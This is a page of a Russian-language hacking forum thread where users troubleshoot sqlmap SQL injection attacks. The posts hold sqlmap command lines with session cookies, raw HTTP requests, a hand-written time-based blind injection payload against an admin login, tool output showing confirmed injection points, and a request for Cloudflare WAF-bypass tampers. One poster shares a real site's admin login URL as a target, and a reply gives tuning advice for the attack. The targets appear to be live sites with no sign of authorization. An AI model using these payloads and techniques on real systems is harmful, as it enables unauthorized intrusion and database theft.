HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #311  
Старый 26.11.2016, 00:09
passwd
Познающий
Регистрация: 23.12.2010
Сообщений: 78
Провел на форуме:
16806

Репутация: 5
По умолчанию

Цитата:
Сообщение от t0ma5  

если оно само заработало, может на сервере ограничение запросов в минуту например?
попробуй --delay=2 выставить, ну попытка не пытка
Попробовал, каждый раз с раного IP.

Код:
--dbms="Microsoft SQL Server 2014" --os="Windows" --random-agent --time-sec 10 --delay=10 --no-cast --parse-errors --tables --hpp
В ответ:

Код:
[15:04:50] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: String or binary data would be truncated'
без --hpp:

Код:
[15:06:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
с --tamper=почти любые:

Код:
[10:49:14] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases
Далее пробовал самостоятельно подставлять -T [user] -C password и т.д.:

Код:
[12:31:07] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Invalid object name 'database_Name.dbo.tbl_Users''
Пробовал брутить с помощью --common-tables, на каждый запрос:

Код:
[12:55:00] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[12:55:00] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Incorrect syntax near '-''
 
Ответить с цитированием

  #312  
Старый 29.11.2016, 10:01
bustudo
Новичок
Регистрация: 18.08.2016
Сообщений: 14
Провел на форуме:
4658

Репутация: 0
По умолчанию

sqlmap выводит сообщение:

[ERROR] possible integer casting detected (e.g. "$_mode=intval($_REQUEST['_mode'])") at the back-end web application

Что полезного несет эта информация и что следует делать дальше,дабы раскрутить инъекцию параметра как следует?
 
Ответить с цитированием

  #313  
Старый 29.11.2016, 11:43
Bobrenz
Новичок
Регистрация: 29.07.2015
Сообщений: 25
Провел на форуме:
8228

Репутация: 0
По умолчанию

Народ, вот тоже вопрос по ошибке во время раскрутки уязвимости

[10:45:46] [INFO] fetching database names

[10:45:50] [WARNING] something went wrong with full UNION technique (could be be

cause of limitation on retrieved number of entries). Falling back to partial UNI

ON technique

[10:45:53] [WARNING] the SQL query provided does not return any output

[10:45:53] [WARNING] in case of continuous data retrieval problems you are advis

ed to try a switch '--no-cast' or switch '--hex'

может кто подскажет как такое обойти
 
Ответить с цитированием

  #314  
Старый 07.12.2016, 01:06
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255

Репутация: 2
По умолчанию

Есть ли актуальные тамперы для cloudflare?
 
Ответить с цитированием

  #315  
Старый 07.12.2016, 19:23
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
Провел на форуме:
50513

Репутация: 1
По умолчанию

Подскажите Blind SQL Injection

POST /admin/login/ HTTP/1.1

Cache-Control: no-cache

Referer: https://site.com/admin/login/

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36

Accept-Language: en-us,en;q=0.5

Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634

Host: site.com

Accept-Encoding: gzip, deflate

Content-Length: 80

Content-Type: application/x-www-form-urlencoded

username=&password=&login=Login

уязвимы оба параметра username,password


'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

перебором вытащила

VERSION 5.5.47-MariaDB

DB site_com

USER site_com

Sqlmap POST parameter 'username' is not injectable POST parameter 'password' is not injectable

sqlmap.py -u https://site.com/admin/login/ --data="username=&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" -v 3 -p username --dbs --prefix="'+" --suffix="+'" --technique=T

Пробовала уже по всякому ,Sqlmap не может найти Inj

Что я делаю не так?

могу скинуть сайт, если подскажете
 
Ответить с цитированием

  #316  
Старый 07.12.2016, 20:23
elvir
Новичок
Регистрация: 30.11.2016
Сообщений: 11
Провел на форуме:
2741

Репутация: 0
По умолчанию

Здравствуйте помогите с этим.

.SpoilerTarget" type="button">Spoiler
sqlmap identified the following injection point(s) with a total of 457 HTTP(s) requests:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL >= 5.0.0

current user is DBA: False

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL 5

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL 5

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL 5

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL >= 5.0.0

current database: None

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=69 AND 4268=4268

---

web application technology: PHP 5.4.34, Nginx

back-end DBMS: MySQL >= 5.0.0
При попытке извелечь бд. Появляется такая ошибка:

sqlmap error unable to retrieve the number of databases

что делать? Название БД я знаю. Но sqlmap не может найти.?
 
Ответить с цитированием

  #317  
Старый 07.12.2016, 23:50
Zen1T21
Участник форума
Регистрация: 13.01.2013
Сообщений: 157
Провел на форуме:
51991

Репутация: 2
По умолчанию

Цитата:
Сообщение от madam  

Подскажите Blind SQL Injection
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=&password=&login=Login

уязвимы оба параметра username,password

'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'
перебором вытащила
VERSION 5.5.47-MariaDB
DB site_com
USER site_com
Sqlmap POST parameter 'username' is not injectable POST parameter 'password' is not injectable
sqlmap.py -u
https://site.com/admin/login/
--data="username=&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" -v 3 -p username --dbs --prefix="'+" --suffix="+'" --technique=T
Пробовала уже по всякому ,Sqlmap не может найти Inj
Что я делаю не так?
могу скинуть сайт, если подскажете
Скинь уже гребаную ссылку
 
Ответить с цитированием

  #318  
Старый 08.12.2016, 00:27
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
Провел на форуме:
50513

Репутация: 1
По умолчанию

Цитата:
Сообщение от Zen1T21  

Скинь уже гребаную ссылку
https: //simplecoin. cz/admin/login/
 
Ответить с цитированием

  #319  
Старый 08.12.2016, 17:57
PoliGroS
Познающий
Регистрация: 29.03.2012
Сообщений: 77
Провел на форуме:
14367

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
C:\sql>python sqlmap.py -r 3.txt -D www -T ibf_moderators --columns --time-sec=10 --random-agent --risk=3 --level=1
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512260a8c}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_|
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 15:55:42
[15:55:42] [INFO] parsing HTTP request from '3.txt'
[15:55:42] [INFO] fetched random HTTP User-Agent header from file 'C:\sql\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.13'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[15:55:43] [INFO] resuming back-end DBMS 'mysql'
[15:55:43] [INFO] testing connection to the target URL
[15:55:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y
[15:55:44] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: submit=%c2%ee%e9%f2%e8&CookieDate=1&PassWord=g00dP a$$w0rD&Privacy=1&referer=&UserName=' AND (SELECT * FROM (SELECT(SLEEP(10)))XUFF) AND 'tyxC'='tyxC
---
[15:55:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0.12
[15:55:44] [INFO] fetching columns for table 'ibf_moderators' in database 'www'
[15:55:44] [INFO] resuming partial value: 2
[15:55:44] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[15:56:01] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[15:56:12] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:56:23] [ERROR] invalid character detected. retrying..
[15:56:34] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:56:45] [ERROR] invalid character detected. retrying..
[15:56:56] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:11] [ERROR] invalid character detected. retrying..
[15:57:22] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:33] [ERROR] invalid character detected. retrying..
[15:57:43] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:55] [ERROR] invalid character detected. retrying..
[15:58:05] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:58:16] [ERROR] unable to properly validate last character value ('7')..
7
[15:58:17] [INFO] retrieved:
[15:58:38] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:58:50] [ERROR] invalid character detected. retrying..
[15:59:00] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:59:21] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:59:32] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
m
[15:59:54] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
i
[16:00:29] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[16:00:51] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[16:00:51] [ERROR] invalid character detected. retrying..
Парни помогите, что делаю не так.
 
Ответить с цитированием

  #320  
Старый 08.12.2016, 18:16
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от PoliGroS  

Парни помогите, что делаю не так.
--time-sec=10 это таймаут, попробуй

--delay=1 это слип в секундах между запросами

а вообще уровень вербозности побольше сделай

-v 4

и посмотри что сервер отвечает

-----------

судя по payload это time-based

как сам думаешь не вешают сервак твои висящие запросы в базе)? надо было как ошибки появились - попробовать зайти на сайт, доступен ли он
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.